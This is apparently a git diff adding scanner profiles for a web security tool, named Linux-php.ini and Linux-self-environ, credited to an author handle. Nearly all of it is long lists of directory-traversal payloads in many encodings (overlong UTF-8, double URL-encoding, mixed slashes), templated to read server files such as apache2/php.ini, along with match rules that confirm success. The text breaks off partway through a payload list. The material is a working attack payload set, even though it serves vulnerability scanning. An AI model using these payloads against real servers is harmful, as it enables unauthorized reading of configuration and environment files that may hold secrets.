+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,///%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,\\\\\\%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,..//{FILE}",
+ "true,..//..//{FILE}",
+ "true,..//..//..//{FILE}",
+ "true,..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//..//..//{FILE}",
+ "true,..///{FILE}",
+ "true,..///..///{FILE}",
+ "true,..///..///..///{FILE}",
+ "true,..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///..///..///{FILE}",
+ "true,..\\\\{FILE}",
+ "true,..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,./\\/./{FILE}",
+ "true,./\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,./../{FILE}",
+ "true,./.././../{FILE}",
+ "true,./.././.././../{FILE}",
+ "true,./.././.././.././../{FILE}",
+ "true,./.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././.././.././../{FILE}",
+ "true,.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.//..//{FILE}",
+ "true,.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,../{FILE}",
+ "true,../..//{FILE}",
+ "true,../..//../{FILE}",
+ "true,../..//../..//{FILE}",
+ "true,../..//../..//../{FILE}",
+ "true,../..//../..//../..//{FILE}",
+ "true,../..//../..//../..//../{FILE}",
+ "true,../..//../..//../..//../..//{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\\\{FILE}",
+ "true,..\\..\\\\..\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
+ "true,..///{FILE}",
+ "true,../..///{FILE}",
+ "true,../..//..///{FILE}",
+ "true,../..//../..///{FILE}",
+ "true,../..//../..//..///{FILE}",
+ "true,../..//../..//../..///{FILE}",
+ "true,../..//../..//../..//..///{FILE}",
+ "true,../..//../..//../..//../..///{FILE}",
+ "true,..\\\\\\{FILE}",
+ "true,..\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,About php.ini"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Linux-php.ini",
+ "IssueSeverity": "Medium",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Linux-php.ini",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [
+ {
+ "type": "Payload",
+ "match": "{FILE}",
+ "replace": "apache2/php.ini",
+ "regex": "String"
+ }
+ ],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Linux-self-environ.bb b/profiles/Linux-self-environ.bb
index 0c361d5..c8a5c28 100755
--- a/profiles/Linux-self-environ.bb
+++ b/profiles/Linux-self-environ.bb
@@ -1 +1,950 @@
-[{"Name":"Linux-self-environ","Enabled":true,"Scanner":1,"Author":"@Sy3Omda","Payloads":["../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\{FILE}","..\\..\\..\\{FILE}","..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","..%c0%af{FILE}","..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%a